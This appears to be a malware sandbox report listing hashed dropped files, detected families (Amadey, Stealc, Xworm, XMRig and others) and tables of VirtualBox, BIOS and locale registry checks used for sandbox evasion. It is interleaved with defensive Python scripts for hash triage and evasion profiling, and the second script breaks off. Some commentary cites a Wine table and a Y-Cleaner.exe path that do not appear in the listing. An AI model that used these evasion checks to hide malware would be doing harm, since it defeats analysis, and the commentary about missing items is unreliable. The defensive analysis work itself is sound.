memory/2972-454-0x00000000002E0000-0x0000000000738000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/3160-473-0x0000000000390000-0x00000000003A0000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\Desktop\YCL.lnk

MD5 cd2bdaf463be216b1a3cfae3774a6041
SHA1 8a30d9d8e9318feece57eb26dda7defbc5722568
SHA256 1afc2faf495971b14118266518ef19402173260677a40e837f01e5dd88d01e9e
SHA512 7298832a143715727c59330cf588884d53bf83e62a1f995fa6ba2d550b76996e3ce291f3a6e01e97b30cdd0bd7f3c7d6562c47d9c99bcbb3b6f6c52fd104def1

memory/2352-486-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4

MD5 b9fc62c23c5d1e08e35944e848c27c49
SHA1 9063ff1d82ffa3a74f85100d579ddfb794fb49bd
SHA256 2e19f17ad09d2c178fda6ab4612fa62c19a2c7cd9509e179c6236552908b60ea
SHA512 8645116b34bc2cc0a848c0edc0892eb8287e721df37914cb803dbd6b9eebab8cf2972f2b4d2066ee674866b7f7dca19e79026735186b363d25056f853bf5a1ef

memory/2352-530-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/2352-543-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 9dc7f05134ea58b5e327e653607f35a1
SHA1 fd7cf07194cbc4c11702da74244775295669bede
SHA256 d0cc6fce653a2c1351e50c1730aaa61d132a6562de3efa382a94ec1dc0c0502b
SHA512 40eb82a56188d0caafd57ccbe891c19b3085ea5c33a8a4045d56570279a007a164a22ac195d3bdebc7c66ed70bba7bb8fda320926d318dc71210dbf11421d17d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

MD5 25593dad9a83536ef6becca2312ba023
SHA1 15a05338ad035f96d9f0b6b9d356e5ddbcbd8537
SHA256 a8518ebaee54f62745047f953c5d118b875bbdc72ebe10d3bc6c91eec0a35e57
SHA512 5b74e3d0036384872af7309c136150230d86aaf1a65c8a9193ba3e2f8ffbc01fd6f9bf1d63dbfee74c038c9b51b76bfd74f01a90f520a2b0a8c872126d90dba9

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

MD5 fc50585b0063e57b067bc2eccfdc7b1c
SHA1 37a3062d353214d44ecb9f1cdb6018395c929d25
SHA256 0fdc23e93b8ca26bc3b3ea26d882dde25f8ca2a9efae3b33b75ff16b9e5abc3e
SHA512 5680fdf83b422c9874b7900a6e24164f579456b2bd52d7e6ddd6d26dcbd51c9490393ae54904d6d25302e41a0095da61ab905a2f094e0158b1cddc8eb4182bde

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/2352-650-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\ProgramData\50E370761CD6C8DF.dat

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

memory/2460-678-0x0000000000CB0000-0x0000000001151000-memory.dmp

memory/2352-679-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/2352-684-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe

MD5 9da08b49cdcc4a84b4a722d1006c2af8
SHA1 7b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

memory/4044-762-0x000000013F990000-0x0000000140FDB000-memory.dmp

memory/3644-823-0x000000013F120000-0x000000013FCC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/3448-836-0x0000000001100000-0x0000000001160000-memory.dmp

memory/3548-856-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-854-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/3548-852-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-850-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-848-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-846-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-844-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-842-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-840-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-838-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/3864-867-0x0000000001220000-0x0000000001232000-memory.dmp

memory/3864-868-0x00000000004D0000-0x00000000004E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/3672-881-0x00000000012D0000-0x0000000001340000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108030101\v6Oqdnc.exe

MD5 d0a56cd33f4917ccce9660312f2e2f45
SHA1 c0948cb562f3a62b430789a5520475a624675680
SHA256 d7bd83b880b413926f9487c9b6e295fd5cdd71b88e2988998d29016a5377e9bb
SHA512 c835272405aed024d683f6e883672a37bdba2ba04b9063afbf2e1eae10980f952ff7171e123b3eda1fcc11f1b0336df03d717a29c8c168ab848d03fb712d1836
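
The listing above mixes three kinds of entries: payloads written into numbered subdirectories of the user's Temp folder, Firefox profile churn that the browser itself produces, and objects that are not files at all (the srvsvc named pipe is reported with the digests of zero-length input). It also lists the same path twice with different hashes (prefs-1.js), which means the file was rewritten during the run. The following Python script is an added example, not part of the sandbox report: it parses this path-plus-hash layout, separates the buckets, and returns only the SHA256 values worth blocklisting. The sample input is constructed from entries above (SHA512 lines were left out of the sample but parse the same way), and the "numbered Temp directory" heuristic is an assumption taken from the paths in this listing, not a documented property of any family named in the report.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample in the layout of the file listing above: a path line, a blank
# line, then hash lines; memory-dump lines carry no hashes. Hash values are copied
# from entries in this report.
SAMPLE = r"""
memory/2352-650-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

MD5 25593dad9a83536ef6becca2312ba023
SHA1 15a05338ad035f96d9f0b6b9d356e5ddbcbd8537
SHA256 a8518ebaee54f62745047f953c5d118b875bbdc72ebe10d3bc6c91eec0a35e57

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

MD5 fc50585b0063e57b067bc2eccfdc7b1c
SHA1 37a3062d353214d44ecb9f1cdb6018395c929d25
SHA256 0fdc23e93b8ca26bc3b3ea26d882dde25f8ca2a9efae3b33b75ff16b9e5abc3e

C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe

MD5 9da08b49cdcc4a84b4a722d1006c2af8
SHA1 7b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$")

# Digests of zero-length input: an entry carrying these has no content at all
# (in this report, the srvsvc named pipe), so it is not a file to blocklist.
EMPTY = {name: getattr(hashlib, name.lower())(b"").hexdigest()
         for name in ("MD5", "SHA1", "SHA256")}

# Assumption drawn from this listing: dropped executables sit in a numbered
# subdirectory of the user's Temp folder.
NUMBERED_TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\\d+\\[^\\]+\.exe$", re.I)
BROWSER_PROFILE_RE = re.compile(r"\\Mozilla\\Firefox\\Profiles\\", re.I)


def parse_entries(text):
    """Return [(path, {algo: digest})] for every hashed entry; memory dumps are skipped."""
    entries, current = [], None
    for line in map(str.strip, text.splitlines()):
        if not line:
            continue
        m = HASH_RE.match(line)
        if m:
            if current is not None:
                current[1][m.group(1)] = m.group(2)
            continue
        if line.startswith("memory/"):
            current = None
            continue
        current = (line, {})
        entries.append(current)
    return entries


def classify(path, hashes):
    if all(hashes.get(algo) == digest for algo, digest in EMPTY.items()):
        return "empty-content"
    if BROWSER_PROFILE_RE.search(path):
        return "browser-profile"
    if NUMBERED_TEMP_RE.search(path):
        return "dropped-payload"
    return "other"


def triage(text):
    """Bucket entries by class; 'rewritten' lists paths seen with more than one SHA256."""
    buckets = defaultdict(list)
    seen = defaultdict(set)
    for path, hashes in parse_entries(text):
        buckets[classify(path, hashes)].append((path, hashes.get("SHA256")))
        seen[path].add(hashes.get("SHA256"))
    buckets["rewritten"] = sorted(p for p, digests in seen.items() if len(digests) > 1)
    return dict(buckets)


def blocklist_sha256(text):
    """SHA256 values worth feeding to a blocklist: dropped payloads only."""
    return sorted(sha for _, sha in triage(text).get("dropped-payload", []))


if __name__ == "__main__":
    for bucket, items in triage(SAMPLE).items():
        print(bucket, items)
```

Running the script over the full listing is a matter of pasting it into SAMPLE or reading it from a file; entries such as the drive-less Y-Cleaner.exe path land in the "other" bucket and should be reviewed by hand rather than dropped.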

Analysis: behavioral2

Detonation Overview

Submitted 2025-03-05 23:34
Reported 2025-03-05 23:37
Platform win10v2004-20250217-en
Max time kernel 119s
Max time network 152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
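
The four tables above record registry reads, not their outcome: opening HARDWARE\ACPI\DSDT\VBOX__ succeeds only on a VirtualBox guest, SystemBiosVersion and VideoBiosVersion expose hypervisor vendor strings, HKCU\Software\Wine exists only under Wine, and Geo\Nation is a locale check rather than a VM check. The useful observation is which processes perform which check: the same set of dropped executables shows up in the VirtualBox, BIOS and Wine tables, while the Geo\Nation query also comes from processes that do none of the three, including mshta.exe. The Python script below is an added example, not part of the sandbox report; it parses rows in the tables' layout, builds a per-process profile, and separates processes that run the full VirtualBox/BIOS/Wine triad (a shared evasion layer is a plausible reading, not something the report states) from those that only query the locale. The sample rows are copied from the tables above; the check categories and the "user-writable path" filter are this example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the tables' row layout (description, registry key,
# process, target); rows are copied from this report, with one geo-only
# process included to show a process outside the triad.
ROWS = r"""
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
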